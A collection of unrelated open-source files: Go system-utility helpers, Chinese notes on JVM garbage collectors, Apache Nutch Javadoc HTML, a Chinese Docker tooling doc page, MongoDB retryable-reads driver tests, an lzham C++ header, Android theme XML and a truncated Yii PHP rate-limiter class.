== -1 { l = i } if b == 0 { break } n = i + 1 } if n == -1 { return string(orig) } return string(orig[l:n]) } // ReadInts reads contents from single line file and returns them as []int32. func ReadInts(filename string) ([]int64, error) { f, err := os.Open(filename) if err != nil { return []int64{}, err } defer f.Close() var ret []int64 r := bufio.NewReader(f) // The int files that this is concerned with should only be one liners. 
line, err := r.ReadString('\n') if err != nil { return []int64{}, err } i, err := strconv.ParseInt(strings.Trim(line, "\n"), 10, 32) if err != nil { return []int64{}, err } ret = append(ret, i) return ret, nil } // Parse Hex to uint32 without error func HexToUint32(hex string) uint32 { vv, _ := strconv.ParseUint(hex, 16, 32) return uint32(vv) } // Parse to int32 without error func mustParseInt32(val string) int32 { vv, _ := strconv.ParseInt(val, 10, 32) return int32(vv) } // Parse to uint64 without error func mustParseUint64(val string) uint64 { vv, _ := strconv.ParseInt(val, 10, 64) return uint64(vv) } // Parse to Float64 without error func mustParseFloat64(val string) float64 { vv, _ := strconv.ParseFloat(val, 64) return vv } // StringsHas checks the target string slice contains src or not func StringsHas(target []string, src string) bool { for _, t := range target { if strings.TrimSpace(t) == src { return true } } return false } // StringsContains checks the src in any string of the target string slice func StringsContains(target []string, src string) bool { for _, t := range target { if strings.Contains(t, src) { return true } } return false } // IntContains checks the src in any int of the target int slice. func IntContains(target []int, src int) bool { for _, t := range target { if src == t { return true } } return false } // get struct attributes. // This method is used only for debugging platform dependent code. func attributes(m interface{}) map[string]reflect.Type { typ := reflect.TypeOf(m) if typ.Kind() == reflect.Ptr { typ = typ.Elem() } attrs := make(map[string]reflect.Type) if typ.Kind() != reflect.Struct { return nil } for i := 0; i < typ.NumField(); i++ { p := typ.Field(i) if !p.Anonymous { attrs[p.Name] = p.Type } } return attrs } func PathExists(filename string) bool { if _, err := os.Stat(filename); err == nil { return true } return false } //GetEnv retrieves the environment variable key. If it does not exist it returns the default. 
func GetEnv(key string, dfault string, combineWith ...string) string { value := os.Getenv(key) if value == "" { value = dfault } switch len(combineWith) { case 0: return value case 1: return filepath.Join(value, combineWith[0]) default: all := make([]string, len(combineWith)+1) all[0] = value copy(all[1:], combineWith) return filepath.Join(all...) } panic("invalid switch case") } func HostProc(combineWith ...string) string { return GetEnv("HOST_PROC", "/proc", combineWith...) } func HostSys(combineWith ...string) string { return GetEnv("HOST_SYS", "/sys", combineWith...) } func HostEtc(combineWith ...string) string { return GetEnv("HOST_ETC", "/etc", combineWith...) } func HostVar(combineWith ...string) string { return GetEnv("HOST_VAR", "/var", combineWith...) } func HostRun(combineWith ...string) string { return GetEnv("HOST_RUN", "/run", combineWith...) } // getSysctrlEnv sets LC_ALL=C in a list of env vars for use when running // sysctl commands (see DoSysctrl). func getSysctrlEnv(env []string) []string { foundLC := false for i, line := range env { if strings.HasPrefix(line, "LC_ALL") { env[i] = "LC_ALL=C" foundLC = true } } if !foundLC { env = append(env, "LC_ALL=C") } return env }
{ "pile_set_name": "Github" }
------------------------ Gc收集器 | ------------------------ # 收集算法是内存回收的方法论, 收集器则是实现了 # jvm规范对收集器怎么去实现, 没有任何规定, 所以不同厂家, 不同版本的可能不一样 # GC收集器目前主要的有 * 新生代收集器 Serial ParNew Parallel Scavenge * 老年代收集器 Concurrent Mark Sweep(CMS) Parallel Old Serial Old(MSC) * 全堆收集器 Garbage First(G1) * 不同的收集器可以共存, 组合使用 * 它们之间没有绝对的最完美的收集器,(如果有, 也不用实现那么多出来) ------------------------ Gc收集器关系图 | ------------------------ +-------------------------年轻代回收------------------------------------+ |[Serial] [ParNew] [Parallel Scavenge] | |--------------------------老年代回收-------------------------------[G1]| |[Concurrent Mark Sweep(CMS)] [Serial Old(MSC)] [Parallel Old] | +-----------------------------------------------------------------------+ # 可以组合的GC收集器 [Serial] + Concurrent Mark Sweep(CMS)] [Serial] + [Serial Old(MSC)] [ParNew] + [Concurrent Mark Sweep(CMS)] [ParNew] + [Serial Old(MSC)] [Parallel Scavenge] + [Serial Old(MSC)] [Parallel Scavenge] + [Parallel Old] [Serial Old(MSC)] + [Concurrent Mark Sweep(CMS)] ------------------------ Serial | ------------------------ # 最基本的, 历史最悠久的收集器, 在JDK1.3.1之前是虚拟机新生代的唯一选择 # 这个收集器是一个单线程的收集器 # 它在执行GC的时候, 会暂停所有的工作线程, 直到它收集结束 # 它在Client模式下的虚拟机来说, 是一个很好的选择 * Client模式(桌面环境), 一般分配给jvm管理的内存不是很大 * GC导致的停顿时间, 完全可以控制在几十毫秒 - 100毫秒以内, 这是可以接收的 * 单线程, 免去了多线程的切换, 可以专注的进行收集工作, 效率更高 # 工作模式(采用复制算法) 1. (第一阶段标记)暂停业务线程, 单线程收集(新生代采用复制算法) 2. 唤醒业务线程 3. (第二阶段标记)暂停业务线程, 单线程收集(老年代采用标记整理算法) ------------------------ ParNew | ------------------------ # 它其实就是 Serial 的多线程版本 # 还可以通过一系列的JVM参数对它进行控制 -XX:SurvivorRatio -XX:PretenureSizeThreshold -XX:HandlePromotionFailure # 他的工作流程 1. (第一阶段标记)暂停业务线程, 多线程收集(新生代采用复制算法) 2. 唤醒业务线程 3. 
(第二阶段标记)暂停业务线程, 单线程收集(老年代采用标记整理算法) # 它相对于 Serial 并没太多的创新之处, 甚至连部分代码都是共用的, 但它却是很多在运行Server模式的JVM的'新生代'首选收集器 * 因为一个与性能无关的原因: 除了 Serial 以外, 只有它能与Concurrent Mark Sweep(CMS)收集器配合工作 # 在单核的CPU环境中, 它的效果不一定比 Serial 好 * 甚至由于多线程交互的开销, 可能不如 Serial * 这个收集器, 在通过超线程技术实现的两个CPU核心环境中, 都不能100%的 保证超越 Serial # 随着CPU核心数量的增加, 它对于GC时系统资源的有效利用还是很有好处的 * 默认开启的收集线程数量与CPU的核心数量相同 * 在核心数量非常多的情况下, 可以通过参数来限制垃圾收集的线程的数量 -XX:ParallelGCThreads=10 # 指定使用ParNew收集器 -XX:+UseConMarkSweepGC * 使用Concurrent Mark Sweep(CMS)作为老年代收集器 * 如果使用该参数, 默认就会使用: ParNew 作为新生代的收集器 -XX:+UseParNewGC * 强制系统使用 ParNew 作为新生代的收集器 ------------------------ Parallel Scavenge | ------------------------ # 新生代收集器, 使用复制算法, 也是可以并行收集的 # 看似与 ParNew 一样, 但是它的目的则是达到一个可控制的吞吐量 吞吐量 = CPU用于业务线程的时间 / (CPU用于业务线程的时间 + CPU用于垃圾收集的时间) * 虚拟机运行了 100分钟, 垃圾回收花费了1 分钟, 则吞吐量就是: 99% * 因为与吞吐量相关,也被称为:吞吐量优先的收集器 # 提供了参数用于精准的控制吞吐量 -XX:MaxGCPauseMillis * 置最大垃圾收集停顿时间, 它的值是一个大于 0 的整数 * 收集器在工作时, 会调整 Java 堆大小或者其他一些参数,尽可能地把停顿时间控制在 MaxGCPauseMillis 以内 * 停顿时间的缩短, 是牺牲了吞吐量(以前10s一次100ms的GC, 现在5s一次70ms的GC)和新生代空间(对体积小的内存收集比较快)换来的, 这也导致GC发生得更加的频繁 * 过小的话, GC停顿时间确实下降了, 但是吞吐量也下降了 -XX:GCTimeRatio * 设置吞吐量大小, 它的值是一个大于 0 小于 100 之间的整数 * 可以理解为: 垃圾收集时间占总时间的比例 * 默认 GCTimeRatio 的值为 99, 那么系统将花费不超过 1 / (1 + 99) = 1% 的时间用于垃圾收集 -XX:+UseAdaptiveSizePolicy * 打开自适应 GC 策略, 在这种模式下, 其他的一些属性不需要自己去设置, 参数会被自动调整, 以达到在堆大小, 吞吐量和停顿时间之间的平衡点 -Xmn(新生代大小) -XX:+SuivivorRatio(Eden和Survivor区的比例) -XX:+PretenureSizeThreshold(晋升老年代对象年龄) * 使用自适应GC策略, 只需要把基本的内存数据设置好,例如堆内存大小值 * 然后仅仅关注/设置最大停顿时间:-XX:MaxGCPauseMillis * 或者给JVM设置一个最大吞吐量 -XX:GCTimeRatio 的优化目标, 具体的工作细节就由jvm完成 ------------------------ Serial Old | ------------------------ # 它是 Serial 收集器的老年代版本, 也是一个单线程的收集器 # 它存在的意义, 也是给 Client 模式的JVM使用 # 如果在Server模式下使用, 它有两个用途 * 在JDK1.5之前与 Parallel Scavenge 搭配使用 * 作为 Concurrent Mark Sweep(CMS) 收集器的后备预案, 在并发收集发生 Concurrent Mode Failure 时使用 * 出现此现象的原因主要有两个:一个是在年老代被用完之前不能完成对无引用对象的回收 , 一个是当新空间分配请求在年老代的剩余空间中得到满足 # Serial 配合 Serial Old工作模式 1. (第一阶段标记)暂停业务线程, 单线程收集(新生代采用复制算法) 2. 唤醒业务线程 3. 
(第二阶段标记)暂停业务线程, 单线程收集(老年代采用标记-整理算法) ------------------------ Parallel Old | ------------------------ # 它其实是 Parallel Scavenge 收集器的老年代版本, 使用标记清理算法, 在JDK1.6以后才提供 # 在此之前, 新生代的Parallel Scavenge收集器存在一个尴尬的问题 * 如果选择了Parallel Scavenge收集器, 那么老年代除了Serial Old收集器外别无选择 * 由于老年代收集器Serial Old在服务端性能上的拖累, 就算使用 Parallel Scavenge 也未必能获得最大的吞吐量效果 * 这种组合的吞吐量, 不一定比使用 ParNew + Serial Old 更好 # Parallel Old 收集器出现后, 就有了和Parallel Scavenge收集器的一个优良组合 * 在注重吞吐量和CPU资源敏感的场合, 都可以优先考虑 Parallel Scavenge + Parallel Old # Parallel Scavenge 配合 Parallel Old 工作原理 1. (第一阶段标记)暂停业务线程, 多线程收集 2. 唤醒业务线程 3. (第二阶段标记)暂停业务线程, 多线程收集 -------------------------- Concurrent Mark Sweep(CMS)| -------------------------- # 以获取最短停顿时间为目标的收集器, 基于标记-清除的算法实现 # 目前很大一部分Java都是应用在B/S环境下的, 尤其重视响应速度, 希望系统停顿时间短, CMS就非常适合 # 它的执行过程稍微要复杂一点 1. 初始标记(Initial Mark) * 停止业务线程 * 标记一下GC Roots能直接关联的对象, 速度很快 2. 并发标记(Concurrent Mark) 3. 重新标记(Remark) * 停止业务线程 * 修正并发标记期间, 因为程序逻辑导致标记产生变动的对象记录 4. 并发清除(Concurrent Sweeo) * 整个过程中, 最耗时的并发标记和并发清除过程不会停止业务线程 # 它是优秀的收集器, 并发收集, 低停顿, 但是也有一些缺点 1, 对CPU资源敏感 * 事实上, 面向并发设计的程序都对CPU资源敏感 * 并发阶段, 虽然不会停止业务线程, 但是因为占用了一部分CPU资源, 从而会导致应用程序变慢, 导致总吞吐量变低 * CMS默认启动的回收线程数:(CPU数量 + 3) / 4, 也就是说在CPU核心数 >= 4的时候, 并发回收时, 占用 25% d CPU资源 * 如果CPU核心数不足 4, 业务线程受到的影响就比较大了, 因为需要付出一半的算力去执行GC * 为了解决这个问题, JVM提供了一种"增量式并发收集器" , 没用,已经被标识为过时 2, 无法处理浮动垃圾, 可能出现:Concurrent Mode Failure 失败而导致另一次Full GC的产生 * 浮动垃圾就是, 在执行并发清理的时候, 因为是并发,业务线程不会停止, 在此期间产生的垃圾, 只能在下一次GC处理 * 也就是说要留足内存空间给业务线程使用, 因此CMS不能跟其他的收集器一样要等到老年代几乎被完全填满了后再进行收集,因为需要预留空间给并发业务线程使用 * JDK1.5环境下,默认老年代内存使用了 68%后, 就会触发该收集器, 这个设置比较保守 * 如果中老年代增长不是很快, 可以适当的调高参数(0 - 100 百分比), 降低GC次数 -XX:CMSInitiatingOccupancyFraction * 如果CMS运行期间,预留的内存不足以业务线程的使用, 就会出现一次:Concurrent Mode Failure 失败 * 这是JVM会启动预案, 临时启动:Serial Old 收集器来重新对老年代进行垃圾收集 * 也就是说-XX:CMSInitiatingOccupancyFraction设置太高, 可能会导致大量的Concurrent Mode Failure 失败, 性能反而降低 3, 因为使用标记清除算法,导致大量的内存碎片 * 碎片过多, 这会给内存分配带来很大的麻烦 * 往往老年代还有足够的内存, 但是因为找不到连续的空间不得不触发一次 Full GC * 为了解决这个问题,CMS提供了一个参数(默认已经开启) -XX:+UseCMSCompactAtFullCollection * 用于在CMS顶不住要进行Full GC的时候, 开启内存碎片的合并整理过程 * 
内存整理的过程没法并发, 空间碎片问题解决了, 但是业务线程停顿时间不得不变长了 * 设置执行多少次不压缩的FullGC后, 跟着来一次带压缩的 -XX:CMSFullGCsBeforeCompaction * 默认为0, 表示每次进入Full GC时都进行碎片整理 -------------------------- G1收集器 | -------------------------- # Garbage-First, 收集器是当前收集器技术发展的最前沿成果之一 * 从JDK7开始 * 设计的目标就是为了替代掉:Concurrent Mark Sweep(CMS) 收集器 # 它是全堆收集器, 老年代, 新生代都行 # 因为是全堆收集器, 所以使用G1的时候, 内存布局就有点儿与其他的收集器不同 * 它把整个堆划分为多个相等大小的独立区域(Region) * 还是保留了新生代, 老年代的概念, 但是新生代和老年代不再是物理隔离了, 它们都是一部分 Region 的集合 * 引入了分区的概念, 弱化了分代的概念 # 比较重要, 单独写
{ "pile_set_name": "Github" }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_55) on Tue Aug 12 22:14:04 PDT 2014 --> <title>org.apache.nutch.microformats.reltag Class Hierarchy (apache-nutch 1.9 API)</title> <meta name="date" content="2014-08-12"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="org.apache.nutch.microformats.reltag Class Hierarchy (apache-nutch 1.9 API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/nutch/metadata/package-tree.html">Prev</a></li> <li><a href="../../../../../org/apache/nutch/net/package-tree.html">Next</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/nutch/microformats/reltag/package-tree.html" target="_top">Frames</a></li> <li><a href="package-tree.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = 
document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 class="title">Hierarchy For Package org.apache.nutch.microformats.reltag</h1> <span class="strong">Package Hierarchies:</span> <ul class="horizontal"> <li><a href="../../../../../overview-tree.html">All Packages</a></li> </ul> </div> <div class="contentContainer"> <h2 title="Class Hierarchy">Class Hierarchy</h2> <ul> <li type="circle">java.lang.<a href="http://java.sun.com/javase/6/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang"><span class="strong">Object</span></a> <ul> <li type="circle">org.apache.nutch.microformats.reltag.<a href="../../../../../org/apache/nutch/microformats/reltag/RelTagIndexingFilter.html" title="class in org.apache.nutch.microformats.reltag"><span class="strong">RelTagIndexingFilter</span></a> (implements org.apache.nutch.indexer.<a href="../../../../../org/apache/nutch/indexer/IndexingFilter.html" title="interface in org.apache.nutch.indexer">IndexingFilter</a>)</li> <li type="circle">org.apache.nutch.microformats.reltag.<a href="../../../../../org/apache/nutch/microformats/reltag/RelTagParser.html" title="class in org.apache.nutch.microformats.reltag"><span class="strong">RelTagParser</span></a> (implements org.apache.nutch.parse.<a href="../../../../../org/apache/nutch/parse/HtmlParseFilter.html" title="interface in org.apache.nutch.parse">HtmlParseFilter</a>)</li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a 
href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/apache/nutch/metadata/package-tree.html">Prev</a></li> <li><a href="../../../../../org/apache/nutch/net/package-tree.html">Next</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/apache/nutch/microformats/reltag/package-tree.html" target="_top">Frames</a></li> <li><a href="package-tree.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &copy; 2014 The Apache Software Foundation</small></p> </body> </html>
{ "pile_set_name": "Github" }
--- title: Docker 应用的开发环境 description: 了解支持 Docker 开发生命周期的最重要的开发工具选项。 ms.date: 08/06/2020 ms.openlocfilehash: 07b42b2bd05ab16ba0fbf61863b050ee2c9e242b ms.sourcegitcommit: ef50c99928183a0bba75e07b9f22895cd4c480f8 ms.translationtype: HT ms.contentlocale: zh-CN ms.lasthandoff: 08/07/2020 ms.locfileid: "87916034" --- # <a name="development-environment-for-docker-apps"></a>Docker 应用的开发环境 ## <a name="development-tools-choices-ide-or-editor"></a>开发工具选择:IDE 或编辑器 无论你更青睐内容丰富、功能强大的 IDE 还是灵活轻量的编辑器,Microsoft 在开发 Docker 应用程序时都能满足你的需求。 ### <a name="visual-studio-code-and-docker-cli-cross-platform-tools-for-mac-linux-and-windows"></a>Visual Studio Code 和 Docker CLI(适用于 Mac、Linux 和 Windows 的跨平台工具) 如果更青睐支持任何开发语言的轻量级跨平台编辑器,可以使用 Visual Studio Code 和 Docker CLI。 这些产品提供简单而可靠的体验,这对简化开发人员工作流至关重要。 安装“用于 Mac 的 Docker”或“用于 Windows 的 Docker”(开发环境),Docker 开发人员即可使用单个 Docker CLI 为 Windows 或 Linux(运行时环境)构建应用。 此外,Visual Studio Code 还支持 Docker 扩展(例如适用于 Dockerfile 的 IntelliSense)和在编辑器中运行 Docker 命令的快捷任务。 > [!NOTE] > 要下载 Visual Studio Code,请转到 <https://code.visualstudio.com/download>。 > > 要下载用于 Mac 和 Windows 的 Docker,请转到 <https://www.docker.com/products/docker>。 ### <a name="visual-studio-with-docker-tools-windows-development-machine"></a>附带 Docker 工具的 Visual Studio(Windows 开发计算机) 建议使用 Visual Studio 2019 并启用内置 Docker 工具。 使用 Visual Studio,可以直接在所选的 Docker 环境中开发、运行和验证应用程序。 按 F5,即可直接在 Docker 主机中调试应用程序(单个容器或多个容器);也可以按 Ctrl+F5,无需重新生成容器,即可编辑并刷新应用。 对于创建用于 Linux 或 Windows 的 Docker 容器的 Windows 开发人员,这是最简单且功能最强大的选择。 ### <a name="visual-studio-for-mac-mac-development-machine"></a>Visual Studio for Mac(Mac 开发计算机) 开发基于 Docker 的应用程序时,可以使用 [Visual Studio for Mac](https://visualstudio.microsoft.com/vs/mac/?utm_medium=microsoft&utm_source=docs.microsoft.com&utm_campaign=inline+link)。 与 Visual Studio Code for Mac 相比,Visual Studio for Mac 提供了更丰富的 IDE。 ## <a name="language-and-framework-choices"></a>选择语言和框架 可以使用 Microsoft 工具和大多数现代语言开发 Docker 应用程序。 以下是初始列表,但不局限于该表: - .NET Core 和 ASP.NET Core - Node.js - Go - Java - Ruby - 
Python 基本上可以使用由 Linux 或 Windows 中的 Docker 支持的任何现代语言。 >[!div class="step-by-step"] >[上一页](deploy-azure-kubernetes-service.md) >[下一页](docker-apps-inner-loop-workflow.md)
{ "pile_set_name": "Github" }
{ "runOn": [ { "minServerVersion": "4.0", "topology": [ "single", "replicaset" ] }, { "minServerVersion": "4.1.7", "topology": [ "sharded" ] } ], "database_name": "retryable-reads-tests", "collection_name": "coll", "data": [], "tests": [ { "description": "ListCollectionNames succeeds on first attempt", "operations": [ { "name": "listCollectionNames", "object": "database" } ], "expectations": [ { "command_started_event": { "command": { "listCollections": 1 } } } ] }, { "description": "ListCollectionNames succeeds on second attempt", "failPoint": { "configureFailPoint": "failCommand", "mode": { "times": 1 }, "data": { "failCommands": [ "listCollections" ], "closeConnection": true } }, "operations": [ { "name": "listCollectionNames", "object": "database" } ], "expectations": [ { "command_started_event": { "command": { "listCollections": 1 } } }, { "command_started_event": { "command": { "listCollections": 1 } } } ] }, { "description": "ListCollectionNames fails on first attempt", "clientOptions": { "retryReads": false }, "failPoint": { "configureFailPoint": "failCommand", "mode": { "times": 1 }, "data": { "failCommands": [ "listCollections" ], "closeConnection": true } }, "operations": [ { "name": "listCollectionNames", "object": "database", "error": true } ], "expectations": [ { "command_started_event": { "command": { "listCollections": 1 } } } ] }, { "description": "ListCollectionNames fails on second attempt", "failPoint": { "configureFailPoint": "failCommand", "mode": { "times": 2 }, "data": { "failCommands": [ "listCollections" ], "closeConnection": true } }, "operations": [ { "name": "listCollectionNames", "object": "database", "error": true } ], "expectations": [ { "command_started_event": { "command": { "listCollections": 1 } } }, { "command_started_event": { "command": { "listCollections": 1 } } } ] } ] }
{ "pile_set_name": "Github" }
// File: lzham_prefix_coding.h // See Copyright Notice and license at the end of include/lzham.h #pragma once namespace lzham { namespace prefix_coding { const uint cMaxExpectedCodeSize = 16; const uint cMaxSupportedSyms = 1024; // This value can be tuned for a specific CPU. const uint cMaxTableBits = 11; bool limit_max_code_size(uint num_syms, uint8* pCodesizes, uint max_code_size); bool generate_codes(uint num_syms, const uint8* pCodesizes, uint16* pCodes); class decoder_tables { public: inline decoder_tables() : m_table_shift(0), m_table_max_code(0), m_decode_start_code_size(0), m_cur_lookup_size(0), m_lookup(NULL), m_cur_sorted_symbol_order_size(0), m_sorted_symbol_order(NULL) { } inline decoder_tables(const decoder_tables& other) : m_table_shift(0), m_table_max_code(0), m_decode_start_code_size(0), m_cur_lookup_size(0), m_lookup(NULL), m_cur_sorted_symbol_order_size(0), m_sorted_symbol_order(NULL) { *this = other; } inline decoder_tables& operator= (const decoder_tables& rhs) { assign(rhs); return *this; } inline bool assign(const decoder_tables& rhs) { if (this == &rhs) return true; uint32* pCur_lookup = m_lookup; uint16* pCur_sorted_symbol_order = m_sorted_symbol_order; memcpy(this, &rhs, sizeof(*this)); if ((pCur_lookup) && (pCur_sorted_symbol_order) && (rhs.m_cur_lookup_size == m_cur_lookup_size) && (rhs.m_cur_sorted_symbol_order_size == m_cur_sorted_symbol_order_size)) { m_lookup = pCur_lookup; m_sorted_symbol_order = pCur_sorted_symbol_order; memcpy(m_lookup, rhs.m_lookup, sizeof(m_lookup[0]) * m_cur_lookup_size); memcpy(m_sorted_symbol_order, rhs.m_sorted_symbol_order, sizeof(m_sorted_symbol_order[0]) * m_cur_sorted_symbol_order_size); } else { lzham_delete_array(pCur_lookup); m_lookup = NULL; if (rhs.m_lookup) { m_lookup = lzham_new_array<uint32>(m_cur_lookup_size); if (!m_lookup) return false; memcpy(m_lookup, rhs.m_lookup, sizeof(m_lookup[0]) * m_cur_lookup_size); } lzham_delete_array(pCur_sorted_symbol_order); m_sorted_symbol_order = NULL; if 
(rhs.m_sorted_symbol_order) { m_sorted_symbol_order = lzham_new_array<uint16>(m_cur_sorted_symbol_order_size); if (!m_sorted_symbol_order) return false; memcpy(m_sorted_symbol_order, rhs.m_sorted_symbol_order, sizeof(m_sorted_symbol_order[0]) * m_cur_sorted_symbol_order_size); } } return true; } inline void clear() { if (m_lookup) { lzham_delete_array(m_lookup); m_lookup = 0; m_cur_lookup_size = 0; } if (m_sorted_symbol_order) { lzham_delete_array(m_sorted_symbol_order); m_sorted_symbol_order = NULL; m_cur_sorted_symbol_order_size = 0; } } inline ~decoder_tables() { if (m_lookup) lzham_delete_array(m_lookup); if (m_sorted_symbol_order) lzham_delete_array(m_sorted_symbol_order); } // DO NOT use any complex classes here - it is bitwise copied. uint m_num_syms; uint m_total_used_syms; uint m_table_bits; uint m_table_shift; uint m_table_max_code; uint m_decode_start_code_size; uint8 m_min_code_size; uint8 m_max_code_size; uint m_max_codes[cMaxExpectedCodeSize + 1]; int m_val_ptrs[cMaxExpectedCodeSize + 1]; uint m_cur_lookup_size; uint32* m_lookup; uint m_cur_sorted_symbol_order_size; uint16* m_sorted_symbol_order; inline uint get_unshifted_max_code(uint len) const { LZHAM_ASSERT( (len >= 1) && (len <= cMaxExpectedCodeSize) ); uint k = m_max_codes[len - 1]; if (!k) return UINT_MAX; return (k - 1) >> (16 - len); } }; bool generate_decoder_tables(uint num_syms, const uint8* pCodesizes, decoder_tables* pTables, uint table_bits); } // namespace prefix_coding } // namespace lzham
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <resources> <style name="MainTheme" parent="MainTheme.Base"> </style> <!-- Base theme applied no matter what API --> <style name="MainTheme.Base" parent="Theme.AppCompat.Light.DarkActionBar"> <!--If you are using revision 22.1 please use just windowNoTitle. Without android:--> <item name="windowNoTitle">true</item> <!--We will be using the toolbar so no need to show ActionBar--> <item name="windowActionBar">false</item> <!-- Set theme colors from http://www.google.com/design/spec/style/color.html#color-color-palette --> <!-- colorPrimary is used for the default action bar background --> <item name="colorPrimary">#2196F3</item> <!-- colorPrimaryDark is used for the status bar --> <item name="colorPrimaryDark">#1976D2</item> <!-- colorAccent is used as the default value for colorControlActivated which is used to tint widgets --> <item name="colorAccent">#FF4081</item> <!-- You can also set colorControlNormal, colorControlActivated colorControlHighlight and colorSwitchThumbNormal. --> <item name="windowActionModeOverlay">true</item> <item name="android:datePickerDialogTheme">@style/AppCompatDialogStyle</item> </style> <style name="AppCompatDialogStyle" parent="Theme.AppCompat.Light.Dialog"> <item name="colorAccent">#FF4081</item> </style> </resources>
{ "pile_set_name": "Github" }
<?php
/**
 * @link http://www.yiiframework.com/
 * @copyright Copyright (c) 2008 Yii Software LLC
 * @license http://www.yiiframework.com/license/
 */

namespace yii\filters;

use Yii;
use yii\base\ActionFilter;
use yii\web\Request;
use yii\web\Response;
use yii\web\TooManyRequestsHttpException;

/**
 * RateLimiter implements a rate limiting algorithm based on the [leaky bucket algorithm](http://en.wikipedia.org/wiki/Leaky_bucket).
 *
 * You may use RateLimiter by attaching it as a behavior to a controller or module, like the following,
 *
 * ```php
 * public function behaviors()
 * {
 *     return [
 *         'rateLimiter' => [
 *             'class' => \yii\filters\RateLimiter::className(),
 *         ],
 *     ];
 * }
 * ```
 *
 * When the user has exceeded his rate limit, RateLimiter will throw a [[TooManyRequestsHttpException]] exception.
 *
 * Note that RateLimiter requires [[user]] to implement the [[RateLimitInterface]]. RateLimiter will
 * do nothing if [[user]] is not set or does not implement [[RateLimitInterface]].
 *
 * @author Qiang Xue <qiang.xue@gmail.com>
 * @since 2.0
 */
class RateLimiter extends ActionFilter
{
    /**
     * @var bool whether to include rate limit headers in the response
     */
    public $enableRateLimitHeaders = true;
    /**
     * @var string the message to be displayed when rate limit exceeds
     */
    public $errorMessage = 'Rate limit exceeded.';
    /**
     * @var RateLimitInterface the user object that implements the RateLimitInterface.
     * If not set, it will take the value of `Yii::$app->user->getIdentity(false)`.
     */
    public $user;
    /**
     * @var Request the current request. If not set, the `request` application component will be used.
     */
    public $request;
    /**
     * @var Response the response to be sent. If not set, the `response` application component will be used.
     */
    public $response;

    /**
     * Initializes the filter, falling back to the application's `request` and
     * `response` components when none were configured explicitly.
     * @inheritdoc
     */
    public function init()
    {
        if ($this->request === null) {
            $this->request = Yii::$app->getRequest();
        }
        if ($this->response === null) {
            $this->response = Yii::$app->getResponse();
        }
    }

    /**
     * Runs the rate-limit check before the action executes. The check is a
     * no-op (with an informational log entry) when there is no logged-in user
     * or the identity does not implement [[RateLimitInterface]].
     * @inheritdoc
     */
    public function beforeAction($action)
    {
        if ($this->user === null && Yii::$app->getUser()) {
            // getIdentity(false) fetches the identity without forcing a login.
            $this->user = Yii::$app->getUser()->getIdentity(false);
        }

        if ($this->user instanceof RateLimitInterface) {
            Yii::trace('Check rate limit', __METHOD__);
            $this->checkRateLimit($this->user, $this->request, $this->response, $action);
        } elseif ($this->user) {
            Yii::info('Rate limit skipped: "user" does not implement RateLimitInterface.', __METHOD__);
        } else {
            Yii::info('Rate limit skipped: user not logged in.', __METHOD__);
        }

        return true;
    }

    /**
     * Checks whether the rate limit exceeds.
     *
     * Implements the leaky bucket: the user may make up to $limit requests per
     * $window seconds; unused allowance is replenished proportionally to the
     * time elapsed since the last recorded request.
     *
     * @param RateLimitInterface $user the current user
     * @param Request $request
     * @param Response $response
     * @param \yii\base\Action $action the action to be executed
     * @throws TooManyRequestsHttpException if rate limit exceeds
     */
    public function checkRateLimit($user, $request, $response, $action)
    {
        $current = time();

        list ($limit, $window) = $user->getRateLimit($request, $action);
        list ($allowance, $timestamp) = $user->loadAllowance($request, $action);

        // Replenish: elapsed seconds * (limit / window) requests, truncated,
        // capped at the full bucket size.
        $allowance += (int) (($current - $timestamp) * $limit / $window);
        if ($allowance > $limit) {
            $allowance = $limit;
        }

        if ($allowance < 1) {
